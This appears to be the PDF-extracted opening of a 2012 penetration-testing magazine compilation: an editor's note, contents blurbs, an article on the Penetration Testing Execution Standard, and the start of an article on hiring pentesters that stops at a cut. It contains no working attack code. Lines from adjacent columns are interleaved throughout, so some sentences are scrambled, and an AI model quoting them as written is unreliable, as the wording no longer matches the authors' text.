You are on page 1of 203

EDITOR’S NOTE

THE BEST OF

Dear Readers!
Dear PenTest community members! It will soon be a year since the PenTest
first issue was released. So here comes the time to summarize the first year
of our work, but also to celebrate our first birthday. And, as most of us know,
there is no birthday without a gift! And this gift from PenTest to you is The
Best of PenTest – 200 pages of content, the best 32 articles chosen from 28
PenTest Magazine issues.
As I’ve mentioned before, apart from celebrating, this special moment is
also a time to look back behind us and see what we’ve managed to achieve
for this time!
TEAM Four issues in a month. Perhaps not everyone reading this is aware
Managing Editor: Maciej Kozuszek
that at the beginning we’ve published only one issue in a month – PenTest
maciej.kozuszek@software.com.pl Regular. After 5 issues were released, we’ve started releasing PenTest
Extra on October 15th, which was recently transformed into PenTest
Associate Editor: Aby Rao Market. Soon after that, we’ve launched PenTest Starterkit, which first issue
abyrao@gmail.com
was released on November 7th. After releasing 3 issues, we’ve decided
Betatesters / Proofreaders: Aby Rao, Rishi Narang, to change the profile of the issue, and therefore it’s name, into Auditing
Jeff Weaver, Scott Christie, Dennis Distler, Massimo Buso,
Ed Werzyn, Jonathan Ringler, Johan Snyman, Michael Munty, & Standards PenTest. The youngest, and seems that the most popular
Alberto Alvarez, Juan Bidini, Eric Stalter magazine, is Web App Pentesting. Firstly released on November 22nd ,
now it has the most downloads and views amongst all other issues.
Senior Consultant/Publisher: Paweł Marciniak
Heaps of books and trainings given to our community members, to help
CEO: Ewa Dudzic raise pentesting & ethical hacking skills. We’ve partnered with dozens of
ewa.dudzic@software.com.pl
companies to help spread the word about our publication, and also spent
countless hours to get all the books and trainings in return, in order make
Art Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@software.com.pl our offer even more attractive and give you what you really need – true
DTP: Ireneusz Pogroszewski value knowledge for a reasonable price.
Production Director: Andrzej Kuca Sponsored numbers of different conferences all around the world to help
andrzej.kuca@software.com.pl the community – beginning from the biggest one, like Hacker Halted or
Black Hat, ending with even the smallest like AthCon.
Publisher: Software Press Sp. z o.o. SK Delivered a lot of reviews and other free content, all to help educate
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631 you!
www.pentestmag.com
What we shouldn’t forget about, is also our editorial staff – all people
who have helped us in a various ways to make existence of our magazine
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
possible. Here, we believe that we owe a special thanks to the following
concerning the results of content usage. people: Aby Rao, Rishi Narang, Jeff Weaver, Scott Christie, Dennis Distler,
All trade marks presented in the magazine were used only for
informative purposes.
Massimo Buso, Ed Werzyn, Jonathan Ringler – thank you, we wouldn’t be
where we are without your help & support!
As always, we hope, you will find this issue of PenTest compelling and
All rights to trade marks presented in the magazine are valuable.
reserved by the companies which own them.
To create graphs and diagrams we used program
by
Enjoy reading!
Maciej Kozuszek
& PenTest Team
Mathematical formulas created by Design Science MathType™

DISCLAIMER!
The techniques described in our articles may only
be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.

THE BEST OF 01/2012 Page 4 http://pentestmag.com


CONTENTS

PENTEST REGULAR describing the benefits and drawbacks. Although


Fixing the Industry
08
typically used for bug discovery in a lab environment,
By Iftach Ian Amit and Chris Nickerson there are opportunities to use fuzzing in a penetration
Penetration testing has been a skill (some say an art) for testing role too. Here, you will certainly get convinced
as long as we can remember information security and the by Josh, that fuzzing can be used in a wide range of
computer industry. Nevertheless, over the past decade or ways.
so, the term has been completely ambiguated.
SQL Injection: Inject Your Way to
What Should You Look For? 38 Success
12 By Bill Mathews By Christopher Payne
Why would you ever need a penetration test? The answer Databases are the backbone of most commercial websites
per usual, depends on your perspective and needs. Most on the internet today. They store the data that is delivered
companies that have sensitive data in their enterprises to website visitors (including customers, suppliers,
should look at getting some form of penetration testing employees, and business partners). Backend databases
Why do I say, some form? Simply put, there are as many contain lots of juicy information that an attacker may be
definitions of penetration testing as there are fish in the interested in. Here the author makes a great introduction
ocean. Seriously, sometimes I think we make this stuff up into the art of SQL Injection.
as we go along.
Hi! I Hacked Your Computer
Physical Goes First On The 46 By Milind Bhargava
16 Importance of Physical Pentesting With every passing day, with each new software, hackers
(With Some Practical Advice) around the world start looking for vulnerabilities and write
By Emerson Lima exploit codes for them. Patching those vulnerabilities
Physical pentesting is still dangerously neglected by takes a lot of time and by then the systems have been
enterprises. With a top-notch digital protection they compromised. As an attacker, there are many ways
seem to forget that it will all come to nothing if a physical to compromise the client side systems, my preferred
security breach happens. Let’s try to look into this method involves social engineering.
problem.
Mastering the Behavioral Techniques
Great Pen Test Coverage Too Close 52 for Quick Rapport and Elicitation
22 for Missiles, Switching to Bullets! By Robin Dreeke
By Aaron Bryson There are skilled conversationalists that can induce an
Tell me if this sounds familiar…you are asked to perform individual tounwittingly divulge their deepest secrets,
a penetration test on customer network to determine the their closest held personal information, and even their
security posture of their assets, and the first thing they banking information and passwords without being asked
do is give you a list of assets that you are NOT allowed any direct or related questions.
to test, because they are critical systems to the business.
Tool Jockeys in Disguise: Defeating
60
Ironic isn’t it? This is exactly the difficulty you can expect
when performing penetration testing in the cloud, but the Push Button Penetration Testers
multiplied by ten. By Wardell Motley
What drives your search for a penetration tester? Was
Attacking the Mobile Infrastructure
26
a recent security breach, or a compliance requirement,
By Bill Mathews or maybe just a conversation over a round of golf with
We will explore a few philosophies for attacking a mobile someone that recently underwent an assessment?
management infrastructure. The article will cover the
On the Automated Black-Box
62
differences in testing mobile stuff vs “everything else” as
well as reusing some of the things you know to demystify Security Testing of Web Applications
the mobile world. By Cristian Tancov and Cristian Opinacru
Fuzzing. Although this technique has been around since
Fuzzing in a Penetration Test
30
1989, it had gained significant importance only with the
By Joshua Wright rise of cloud computing era, which, ironically,means it
Protocol fuzzing has been a popular technique for bug is still in its early days (at least for the web applications
discovery with a number of tools, books and papers fuzzing).

THE BEST OF 01/2012 Page 5 http://pentestmag.com


CONTENTS

PENTEST EXTRA Regardless of method, going after physical security in


From Footprinting to Exploitation
70
a PenTest often proves one of the easiest ways to gain
By Piotr Chynał access to a network.
Tenable Nessus is a very popular tool for scanning for
XSS & CSRF Practical exploitation
108
vulenrabilities. Piotr Chynał will show you all task that
you need to know to do penetration test using Nessus of post-authentication
and Metasploit. He will answer to typical questions: Is it vulnerabilities in web applications
really good? Can we use it for penetration testing? By Marsel Nizamutdinov
The goal of this article is to demonstrate the real danger
Web Application Security
76
of post-authenticated vulnerabilities. We will not explain
By Jakub Gałczyk the basics of web application attacks in this article,
By using our web site, managers can send us their as that has already been done many times before by
documents and resume. In our web page, we have others. We will focus on a practical way to exploit post-
installed and configured some kind of popular CMS authentication XSS’s and CSRF, which remain a highly
(Content Management System). Jakub Gałczyk, in his underestimated attack vector in the security scene.
short article, presents how to check whether the web
Finding your target
116 By Willem Mouton
application is vulnerable to Internet attacks.

The Benefits of Ethical Hacking


82
Dumpster diving, if you are up for it and have physical
By Bryan Soliman access to the target, means sifting through trash to get
The wide growth of the Internet has brought good things useful information, but in recent times social media can
to the modern societies such as easy access to online provide us with even more. Sites like LinkedIn, Facebook
stores, electronic commerce, emails, and new avenues and Twitter can provide you with lists of employees,
of information distribution and advertising. As with most projects that the organization is involved with and
technological advances, there is always a dark side: the perhaps even information about third party products and
criminal hackers where they represent a threat to these suppliers that are in use.
information avenues.
PENTEST MARKET
Is That A Phone In Your Pocket Or The Hunt for Pentesters
86 Are You Scanning My Network? 120 By Fabiana Schütz
By Ken Westin The aim of this article is to give the reader and idea of the
When most people think of penetration testing, they think criteria assessed by headhunters to identify trustworthy
of a simulated external attack where the tester tries to and technically capable pentesters. By shedding light on
break into a network from a remotely. Companies focus those aspects, this article will therefore give the readers
most of the security spending and policies on keeping an understanding of the usual education, competencies
hackers from the outside in, from firewalls and other and soft skills a valuable pentester should demonstrate.
security hardening appliances, software and tools.
PENTEST STARTERKIT
Penetration Testing For iPhone and PenTesting and risk management
92 iPad Applications 124 By Alessandro Manotti
By Kunjan Shah As far as attack popularity goes, the analysts determined
This article focuses specifically on helping security that DDoS was mentioned in 22 percent of internet forums
professionals understand the nuances of penetration testing discussions. SQL injection, a technique commonly used
iPhone/iPad applications. It attempts to cover the key steps to compromise websites, is the second most frequently
the reader would need to understand such as setting up the discussed attack method.
test environment, installing the simulator, configuring the
QRbot – iPhone QR botnet
128 By Nir Valtman
proxy tool and decompiling applications etc.

Guaranteed Access
102 By Jon Derrenbacker
This article is related to both social engineering and cyber-
crime. Why social engineering? Since QR usage is based
Everyone has different ideas of what physical security is, on interactive actions of mobile users, which might lead
what it encompasses, and how to exploit it. It can include to threats on their devices, as will be explained in detail
a wide range of exploits, many being surprisingly simple. later.

THE BEST OF 01/2012 Page 6 http://pentestmag.com


CONTENTS

IT Security & Risk to data – the Web Session Management


134 ever changing landscape 160 – reality is a nightmare!
By Carl Nightingale By Rishi Narang
The world of corporate governance has brought added Session Management is fundamentally a process
pressure and cost to organisations safeguarding of keeping track of a user’s activity across multiple
themselves against external (and not forgetting the connections or interactions with the machine. Rishi
internal) threats. Sarbanes Oxley, PCI, Solvency, MiFID, (to Narang shows checklist of precautions for developers to
name but a few) has forced organisations to take a closer follow as a benchmark option for web applications.
look at how they apply control over their operations.
Modeling Security Penetration Tests
AUDITING & STANDARDS 166 with Stringent Time Constraints
By Alan Cao
PENTEST In this article author Alan Cao discusses the modeling
Operating System Security Re-
138 visited
aspect of XBOSoft Modeling, Planning, Execution, and
Analysis (MPEA) approach and explains how to best
By Ian Tibble model security projects with little time. Company’s overall
Information security, in terms of the risk management of goal of penetration testing is to reduce vulnerability-
electronic information, is a young and relatively new practice associated risks in a limited time.
in the business world. Information security departments
Cloud Computing – Legal Issues
172 By Abhijeet Parandekar &Sagar Rahurkar
are less than a decade old in many businesses.

Separating Fact from Fiction – The


144 realities of Cyber War
Cloud computing involves the sharing or storage by
users of their own information on remote servers owned
By Don Eijndhoven or operated by others and accessed through the Internet
Cyber War. Two words that you’ll have heard in the news or other connections.
a few times by now. You’ll have heard it more and more
Web Application Security and
180 Penetration Testing
over the last year or so. Maybe two or three years if you’ve
been halfway interested or happened to be browsing on
IT websites that cover cyber warfare. By Bryan Soliman
Author shows the importance of Penetration Testing in
PENTEST STANDARD Web Application Security. Penetration testing includes
Network Segmentation – The clues
148
all of the process in vulnerabilities assessment plus
to switch a PCI DSS compliance’s the exploitation of vulnerabilities found in the discovery
nightmare into an easy path phase.
By Marc Segarra López
Open Source Web Application
188 Security Testing Tools
There is no better description of network segmentation
in PCI DSS than the one Marc Segarra López presents
in his in-depth article. Everything there is to know, By Vinodh Velusamy
from addressing PCI DSS compliance to special Author shows us the significance of Open Source Web
recommendations on any situation can be found in Application Security Testing Tools. As he claims „When
here. you choose and use good tools, you’ll know it. Amazingly,
you’ll minimize your time and effort installing them,
WEB APP PENTESTING running your tests, reporting your results – everything
The significance of HTTP and
154 the Web for Advanced Persistent
from start to finish.

Threats A chance to ease automated Web


By Matthieu Estrade 196 Site testing
The means used to achieve an APT are often substantial By Marek Zachara
and proportional to the criticality of targeted data „Testing a web application is a tedious task. Also, the
– note Matthieu Esterade. Author claims that APT requirements for a perfect tester are almost impossible
are not just temporary attacks, but real and constant to meet. Such person should be thorough, resistant to
threats with latent effect that need to fought in the long boredom of numerous repetitions and yet creative to
run. invent new testing scenarios” maintains author.

THE BEST OF 01/2012 Page 7 http://pentestmag.com


PENTEST REGULAR

Fixing the Industry

Penetration testing has been a skill (some say an art) for as long
as we can remember information security and the computer
industry. Nevertheless, over the past decade or so, the term
has been completely ambiguated. It has been cannibalized,
commercialized, and transformed into a market where charlatans
and professionals are on the same playing field.

T
he commercial industry has embraced the lack of value presented by the Scanner type of testing
Sexyness of penetration tests, built products and some brainstorming of how that could be resolved
around it uprooted its values with product marketing worldwide. This issue was not localized or specific to any
and sales speak, and conned organizations into buying vertical but it was something that InfoSec professionals
deeper and deeper to the dreaded pentest unit (as in I from all around the globe were experiencing. From these
need 2 units of pentest to complete this compliance effort). sessions happening at EVERY security conference
Backed by a thriving regulatory compliance rush to check- thrown an idea was born. The idea – to finally standardize
off as many items as they can on audit lists, pentesting and define what a penetration test really is. This would
was given the final blow to its heritage of value. A once help the testers increase the quality and repeatability of
surgical skill that required innovation, critical thinking, the testing while also giving the organizations doing the
technical savvy, business understanding, and good old testing, a reference list of what is to be done during the
hacker-sense was reduced to a check box on the back of test. This is where the Penetration Testing Execution
a consulting companies marketing material. Standard (PTES) started. After a couple of months of
This type of market commoditization has led to the working behind the scenes, a group of about a dozen
frustration of many businesses and consultants alike. security practitioners from different parts of the industry
With this in mind, a group of security veterans (each one put forth a basic mind map of how they did penetration
Commercializing security tools and Compliance tests. Later on, that blended map was released to a larger
are giving the industry a double-blow group of InfoSec professionals. This group tore apart the
original map and streamlined it to fit a larger and wider
with at least a decade under their belts, and numerous audience. At that point a final rendition of the mindmap
successful penetration tests in various industries) have was constructed between 25+ International InfoSec
gotten together to discuss the state of the industry, and a Professionals. With over 1800 revisions to the Alpha
common gripe was echoed. Many of the venting sessions mindmap, the team then opened up the stage for more
from professionals around the world centered around massive collaboration and started building one of the
the wide array of testing quality within penetration tests. more exciting concepts in the security industry. Currently
This huge gap was often boiled down to the Scanner/ the Penetration Testing Execution Standard is backed by
Tool Tests and the Real Testing arguments. Another dozens of volunteers from all around the world, working in
common theme for these sessions was the decided teams on writing the finer details of what will be the golden

THE BEST OF 01/2012 Page 8 http://pentestmag.com


standard for penetration testing for organizations as small perceived by an investigative attacker. A lot of information
as a 15 people company, and as large as a government is being spilled out through unauthorized (and seemingly
agency or a nation’s critical infrastructure. legitimate) channels, social media, and just plain old bad
The standard spans seven sections that define the policies. It is crucial for the tested organization to see
content of a penetration test. These sections cover exactly what information is available out there in order to
everything from how to formalize the engagement either prepare for such information being used against them
legally and commercially, up to what areas the final or fix any policy/training gaps that it may have in relation to
report should cover. Following is an overview of the information disclosure. Until this exercise is performed, most
seven sections and what they reflect in terms of how a companies do not understand the gravity of the information
penetration test should be conducted. that can be collected about them. For example: If a tester
can identify that the customer is using an unpatched version
Pre-Engagement interaction of Acrobat (found through the analysis of metadata within
In this section the standard defines some basic rules a published document), they are a prime candidate for a
of engagement, scoping, points of contact, and most client side/malicious file attachment attach. Also, if there
importantly goals for the engagement. It is often neglected are sensitive documents published on corporate directed
and overlooked (as in our previous example of two pentest locations, it may pose an even bigger risk (i.e. VPN Login
units – that are usually followed by a website or an IP instructions on a public webserver; Yes…we ran into these
address to be tested), and one of the main reasons for many times in the past).
organizations not getting any value out of such testing. The The information and intelligence gathering phase
section goes on to define what are the allowed resources aims to gather as much information as possible about
that the tester can utilize in the business, and the tester is the target and fully explore the increased threat surface
given an opportunity to gain a better understanding of what to attack. The standard covers digital collection through
is the business aspect that is being scrutinized, and what open source intelligence resources as well as paid for
are the real goals of the test (which are NEVER a server, resources, physical on-site collection and observation,
an application, or even a network). In addition to the goal/ and human intelligence collection. After all, the more a
value oriented approach of the tester, the organizations tester has to attack the more comprehensive the results
receiving the test (customer) will also be able to reference will be. This is the most aggressive approach available
this section. The customer will be able to set guidelines for but will not be required for all strengths of tests. It’s
the test, understand the safeguards put in place and have important to note that the standard will also define levels
a full understanding of the communication pathways that or strength of operations within each section – which
will be open throughout the test. Often times, customers would allow small engagements to employ the more
do not have the appropriate channel of communication standard OSINT (Open Source Intelligence) methods,
with the testing group and it causes confusion in the testing and larger scale or higher level/strength engagements
process. We aim to make the goals and tests performed to include the more elaborate on-site, physical and
clear to both sides well before the testing begins. HUMINT (Human Intelligence) elements.

Information and Intelligence Gathering Threat Modeling


In this section the standard really kicks in. This is where The threat-modeling section provides the tester and the
we were receiving the most comments in the lines of this organization with clear documentation of the relevant
is too expensive, we don’t know how to do this, and this threat communities as well as the assets and their values.
is not really necessary. From our collective experience The threat modeling is performed around two central
(at least the founding team) we can clearly state that lines – the attacker, and the business assets. From an
when this phase is done right, we can already know the attacker perspective, all the relevant threat communities
outcome of the pentest. During the intelligence-gathering are identified, researched, documented, and their
phase, the tester aims to build a comprehensive as capabilities are fully analyzed and documented.
possible picture of the target organization. Everything From a business asset perspective, all the critical business
from corporate information, the vertical in which the assets (physical, logical, process, 3rd party, intellectual,
organization is operating in, business processes that are etc.) are identified. During the documentation phase of
crucial to the business, financial information and all the way these assets, every relevant supporting technology system
up to mapping out specific personnel, their online social is mapped, along with the relevant personnel, interaction,
presence and how to use all of that information in a way that processing, and the information lifecycle.
an attacker would use. On the other hand, the organization The main output from this phase is a well-documented
being tested will finally get a clear overview of how it is being threat model that takes into account the data gathered

THE BEST OF 01/2012 Page 9 http://pentestmag.com


PENTEST REGULAR
and analyzed at the intelligence gathering phase, and can intelligence, threat modeling and vulnerability analysis in
be used to create attack trees and map out venues for place; this phase becomes much more focused and more
vulnerability analysis of key processes and technologies. importantly much more fine-tuned to the organization being
This is another key component to providing value in tested. In a proper penetration test, we should not just see
Penetration Testing. If the customer does not know what the spread-spectrum scans and exploitation attempts on
threat is to the business or the actual risk, why should they every conceivable technology from a tool or two, but also
resolve the issue. Threat Modeling provides a weighting (and again – much more importantly) a dedicated attack
system so that testers can rely less on a screenshot of a path that lends from the true assets that the organization
shell and more on the overall value to the business. holds and the specific vulnerabilities (either technology
related or human/process related). This type of validation
Vulnerability Analysis is a process that is often lost in the throw all the attacks we
Only at this stage we run into what more traditional have at it type automation. Here, the standard aims to act
penetration tests actually include in their scope. As we on the vulnerabilities identified and confirm or refute their
can clearly see, the new penetration testing execution existence. Many testers and testing tools, due to lack of
standard provides a much more thorough background actionable intelligence or poor planning, will run exploits
– both from a business understanding, as well as from a against hosts that do not have the exploitable package
technical perspective to the test. Leveraging this extensive running or even installed. This causes undue increased
research, the vulnerability analysis phase (which can traffic and potential risk to the business environment.
sometimes be considered as a technology centric threat
modeling) defines the extensive coverage of mapping Post-Exploitation
out and documenting any vulnerability in processes, At this point most pentests conclude the engagement
physical infrastructure, and of course technology related and provide a report that includes every finding with
elements. This phase does include some interaction some sort of traffic light rating (low, medium, high...) that
with the organization, as the testers probe for services is pre-baked into the reporting tool. However, real world
and equipment, confirm assumptions made at the attacks would not suffice in getting a foothold inside the
threat modeling and intelligence gathering phases, and organization, and would try to leverage it further – either
fingerprint the underlying software being deployed. trying to obtain additional information/resources, or to
One of the deliverables from this phase (on top of the actually find a way to exfiltrate the information/control
actual vulnerability mapping and assertion) is attack trees outside of the organization. The exfiltration and access
that correspond to the entire process thus far. This by to the data types or control systems will fit directly into
itself can provide a lot of value to the organization as a the threat modeling conducted earlier in the process.
living document that can be updated with relevant threats, The tester will be able to show the real company impact
vulnerabilities and exposure that is used as one of the of certain attacks and why they are relevant to the
parameters for the ongoing risk management practice. company (i.e. there is a big difference in showing an
Mind you, this is not just running a scan or port executive a screenshot of a shell than showing them
mapping. This is a comprehensive process to analyze the interface THEY use to change the General Ledger
the data collected for attack routes as well as identify within the ERP system. This type of focus provides an
venues for attacks. The tester will leverage conventional instant impact and is formatted in the language that
and unconventional ways to identify vulnerabilities from makes sense to the business).
missing patches, open services, misconfigurations, The post-exploitation phase defines the scope of
default passwords, Intellectual Property leakage, such additional tasks, that provide the organization with
increased threat through information (leaked passwords/ a way to see how would it really stand up to such an
docs), and much more. This hybrid approach allows attack, and whether it would be able to identify related
the testers to collect actionable information and rank data breaches and leaks. Conducting this focused
the ease of attacks. Once the tester has analyzed the attack on resources paints a very clear and concise
potential vulnerabilities present, they will have a clear picture of the threats capability and its possible effects
picture of what/why/how/where and when to execute on the business as a whole.
attacks to confirm the validity of that vulnerability.
Reporting
Exploitation Finally – this trip through an attackers modus-operandi
The exploitation section is very close to the common scope needs to be concluded with a clear and useful report,
of penetration tests these days. It includes the actual attack for the organization to actually see value from such an
execution against the organization. With all the proper engagement. The value is not limited to documenting

THE BEST OF 01/2012 Page 10 http://pentestmag.com


the technical gaps that need to be addressed, but also an additional value to the customer as they are allowed
needs to provide a more executive-level report that to test the effectiveness of their defensive monitoring
reflects the organization’s exposure to loss in business systems and/or outsources solutions.
terms (financial). This would include the actual meaning At the end of the day, the forces of the industry will
of which assets are at the highest risk, how much dictate what a penetration test will look like and what
resources are used to protect different assets, and a would it contain. Nevertheless, the PTES is aimed to
recommendation on how to more efficiently close any provide the industry with a baseline it clearly lacks now.
gaps in exposure by spending resources on controls The term has been mutated over many iterations and
and protections more intelligently. it has been given a very narrow freedom to operate
Such a recommendation would not have been possible between the minimum that has been dictated by
without the surrounding activities that provide the business regulatory requirements (which did good and actually
relevance of the exercise and the tested business forced more businesses to test themselves), and the
elements. This is also where the organization would “glass ceiling” that has been created de-facto by the
end up finding the most value out of the engagement, hordes of pentesters that know nothing better than
as opposed to most common pentests which leave it using some product to push out a report to the customer
with a laundry-list of exploits and vulnerabilities, without and move on to the next. By clearly defining the term
their actual relevance or business impact. In the report, (which is used in a multitude of standards without an
the tester will be required to identify the symptomatic adequate definition of what it means or consists of)
vulnerabilities (like a patch missing) as well as tie out the and what the purpose, value and components of a
systemic vulnerabilities – a patch is missing BECAUSE Penetration Test are, PTES will increase the confidence
there are gaps in policy and procedure in x/y/z area which of customers and testers alike. For quite some time
allowed for the patch to not be now, organizations expect
installed in a timely manner or
Measuring detection and incident response is an the value of conducting a
within the specified time)
integrated part of a penetration test Penetration test to be not
It’s important to note that although there isn’t a much more than a rubber stamp on the audit report or a
dedicated section for detection and incident response, ticked checkbox on their compliance worksheet. PTES
the organizations capabilities to identify, and react to is attempting to increase that value and blow some wind
anything from the intelligence gathering, through the into the dwindling sails of what once was a critical part
vulnerability analysis, exploitation and post exploitation of running a secure operations. In the modern days
is also put to the test. The penetration test includes where everyone being so easily hacked by an APT isn’t
direct references to such capabilities in each section (as it time our testers start acting like one? Or would you
well as in the reporting section), and can be extremely rather an Automated Penetration Test (APT) that you
useful to clearly identify the organization maturity in pay for and does not even attempt to learn WHY they
terms of risk management and handling. This provides are doing the test in the first place?

IFTACH IAN AMIT CHRIS NICKERSON


brings over a decade of experience in Chris Nickerson, CEO of LARES, is just
the security industry, and a mixture of another Security guy with a whole
software development, OS, network bunch of certs whose main area of
and Web security expertise as Vice expertise is focused on Real world Attack
President Consulting to the top-tier Modeling, Red Team Testing and Infosec
security consulting �rm Security- Testing. At Lares, Chris leads a team
Art. Prior to Security-Art, Ian was of security professional who conduct
the Director of Security Research at Risk Assessments, Penetration testing,
Aladdin and Finjan. Ian has also held Application Testing, Social Engineering, Red Team Testing and
leadership roles as founder and CTO Full Adversarial Attack Modeling. Prior to starting Lares, Chris
of a security startup in the IDS/IPS was Dir. of Security Services at Alternative Technology, a Sr. IT
arena, and a director at Datavantage. Prior to Datavantage, compliance at KPMG, Sr. Security Architect and Compliance
he managed the Internet Applications as well as the UNIX Manager at Sprint Corporate Security. Chris is a member of
departments at the security consulting �rm Comsec. many security groups and was also a featured member of TruTV’s
Ian is a frequent speaker at the leading industry conferences Tiger Team. Chris is the cohost of the Exotic liability Podcast, the
such as BlackHat, DefCon, Infosec, Hacker-Halted, FIRST, author of the upcoming RED TEAM TESTING book published by
BruCon, SOURCE, ph-neutral, and many more. Elsevier/Syngress and a founding member of BSIDES Conference.

THE BEST OF 01/2012 Page 11 http://pentestmag.com


PENTEST REGULAR

Penetration Testing
What Should You Look For?

So you’re in the market for penetration testing? Do you know what


you’re buying? Do you know how to buy it? I will attempt to define
the types of penetration testers out there along with a sound
Request for Proposal process for penetration testing. Be careful
what you buy, you only get what you ask for.

S
o right off the top, a disclaimer: I earned a living These are the guys who point Qualys, Nessus, or worse,
for many years as a penetration tester and now turned all the way up, at your network, press submit and
run the penetration testing team at Hurricane watch the fireworks. Typically they do no tuning of the
Labs. Now that I have that out of the way, here we go. scan and just let it go. This is dangerous on so many
Why would you ever need a penetration test? The levels, and this sort of thing can quickly bring down your
answer, per usual, depends on your perspective and whole network. You’ll recognize them because their
needs. Most companies that have sensitive data in salespeople will say all the right things but their slicked
their enterprises should look at getting some form of back hair will give it away. Ask them about their manual
penetration testing. Why do I say, “some form”? Simply testing methods and soon you’ll realize they have none.
put, there are as many definitions of penetration testing By the way, these are the sorts that will give you a clean
as there are fish in the ocean. Seriously, sometimes I bill of health in a day or so and offer no real opinion on
think we make this stuff up as we go along. If you’re your applications or network. Avoid this sort of tester at
looking at hiring out a third party to do your penetration all costs.
test (and you should, reasons later), I think it would be
helpful to go through some of the definitions as I see Definition Number 2 (N2)
them in the industry. This list should then help you form The Old Smash and Grab
some intelligent questions to ask the companies you
are considering. After the definitions we’ll review some I wish I could take credit for this but it was coined by
questions you should include in your RFP to help weed a colleague of mine (Rick Deacon @rickdeaconx).
out some of the pretenders. Basically these are the guys who come in and simply
destroy your network and applications with no regard
Definition Number 1 (N1) for your business or money lost. They are also scanner
Let’s scan them and hope they never actually get heavy and generally are in love with BackTrack and
attacked. Metasploit but only know enough to break things
and usually offer no recommendation on fixing them.
This is my least favorite of the varieties out there, mainly These are also the types that will drop a 120-page
because I thought this breed of service was long dead. report (single-spaced) on your desk and disappear.
Sadly I still see it out there almost every week or so. They are generally only slightly better than number one

THE BEST OF 01/2012 Page 12 http://pentestmag.com


in that they employ some tools that take slightly more Definition Number 5 (N5)
skill than just pressing submit. They can be harder to The Auditor
detect because they can talk a good game and make
it sound like what you expect a penetration test to be. The auditor is a funny one: they aren’t actually
These are the ones you hear about that can tell you a auditors, but they walk and talk like one. Words like risk
whole lot about an application being broken but very analysis and GAAS are tossed around without concern
little on how to fix it or why you should fix it. These for anyone’s safety. This type tends to not be very
are the sorts of testers you would want to use on pre- technical and would prefer to just interpret the results
production testing. If your application or setup has an of the more technical folks. This is the type that LOVES
obvious flaw they will probably find it. You wouldn’t to assign scores to things and put everything into its
look to these guys for any precision testing or advice neat little box. You find this type of tester at accounting
about how your stuff should look or work. firms and other odd places to find penetration testers.
Again, they’re usually not doing the actual penetrating
Definition Number 3 (N3) but just tend to work on the reporting the most. They
The Pacifier also like to have a lot of letters after their names, I
don’t know why, that’s just how it is.
This type of tester is basically afraid to break anything.
He will run light scans and quote best practices in the Definition Number 6 (N6)
reports but do little else. He won’t venture to break The Rich Kid
anything for fear of the customer’s never hiring him
again. He will go to great lengths not to offend any I’ve run across this one quite a bit in my career and I
application developer or network architect, so some can almost always predict their argument. They’re the
things tend to go unreported. You will most often ones who invested $100,000 in the tool of the year
see this type in smaller places that offer a ton of and rely only on that tool to do the actual testing. They
services and products. They typically have some other tend to be less technical that good testers but if all
relationship with the customer on some other level, you’re after is a check mark on your audit they’ll suffice.
maybe they sell them products or repair their printers They use terms like Big Three firms and Fortune 500
(don’t laugh – I’ve seen this) and oh, by the way, they customers as if they’re going out of style. They are
offer penetration tests too. Ideally you would want to very buzzword-heavy and like to tell you how the tools
engage a place that has nothing to lose or has sufficient they use rate very highly on various industry tests. It’s
division of penetration testing responsibilities. This will not that I’m opposed to a lot of the tools out there for
become obvious after a good round of questions. professional testing; I just don’t understand the point.
My philosophy is and has always been that an attacker
Definition Number 4 (N4) is probably not going to spend that kind of money for a
The RFCist tool to attack your network or application. The attacker
will, more often than not, rely on some open source tool
This is a lesson I learned the hard way; you see, I they find or write the exploit themselves. My belief is
used to be an RFCist. I’m about 5 years clean now. that a good tester should mirror the attacker and then
The RFCist is the person that can quote to you every add the value of professional experience on top of that
section of every RFC on the planet but not be able skill. A good place for the rich kid is an internal team
to tell you why your application or network should that is just looking for the so-called low-hanging fruit.
conform. The RFCist tends to be very poor at risk Why would we want to outsource our penetration
analysis and tends to not understand the need for tests in the first place? The reason is simple: typically
executive summaries. Again I have been an RFCist you want an unbiased look at your network and/or
and have managed and still manage quite a few of application. You want someone to look at it externally
them. They can be challenging to manage but they are, and tell you what they can see and can prove as
typically, invaluable members of a good penetration security issues. This can help you build a more robust
testing team. The reason being is that they tend to application or network and alert you to any number of
be very technically proficient and detail-oriented, both problems with your set-up. If you have internal folks
of which are absolute requirements on a good team. looking at it from a security angle – and you should
Usually their upsides far outweigh the downsides but do that too – they will sometimes overlook something
I’m very biased here. We also tend to be a very anti- because the set-up is so familiar to them. Also, internal
social lot but that’s okay, no one is perfect. folks tend not to want to embarrass their buddy in the

THE BEST OF 01/2012 Page 13 http://pentestmag.com


PENTEST REGULAR
next cube; I’ve see internal folks clue in their app dev have the best tester in the world but they cannot
buddy and ruin the integrity of the test by letting them communicate their thoughts coherently, what is their
fix it first. It is a great idea to have an internal team, but end report going to look like? Probably pretty poor.
they should not be your sole source of testing. You need If you can see writing samples and get an idea of
an unbiased look. their philosophy ahead of time you will build a greater
Every company has different needs, so you want to comfort level with them.
weigh what you really need against what you’re going to
buy. If you have 10 desktops, no website, and outsource Has any current member of your team written
your email, you probably don’t need a penetration test and/or released any penetration testing or
at all. If, however, you have 10,000 desktops and 15 security tools?
websites running across 1,000 servers and take credit This can separate the good testers with a mastery of
card transactions you should not be asking if you need their toolsets from the truly great ones who can write
a penetration test, you should be asking how many you their own tools if necessary. As with the article writing
should have a year. The process should and can be above it can give you a good idea ahead of time of their
painless for you if you do your due diligence up front philosophy as well as their technical skill.
and ask the right questions.
Your journey should begin with a simple RFP process, Please de�ne your testing philosophy
and I will tell you, as a guy who has done this for a Every good team should have a sound philosophy
number of years, long form RFPs will not get you the around their testing. It should include what they will do
best testers out there. I have thrown away more long and, just as importantly, what they won’t. For instance,
form RFPs than I care to remember. In some cases the I don’t like to include denial of service testing in our
RFPs were longer than the report would have been: I standard testing offerings; that’s spelled out up front.
have seen 20-page RFPs for testing out a single /27 Others I’ve seen include what sorts of tests will be run
subnet. against a web application. This gives you an idea of how
much thought has been put behind a company’s service
You want to start off with a clear mission offering. It will also almost always rule out definition N1
statement for your test: what do you want to from above.
accomplish with this test?
This helps the respondent understand what you want to Can a tester be reached during the test?
get out of the test and can help focus team members in Ask for an emergency phone number where you can
on exactly what you want. Do not skip this step; it might contact the tester during the testing phase just in case
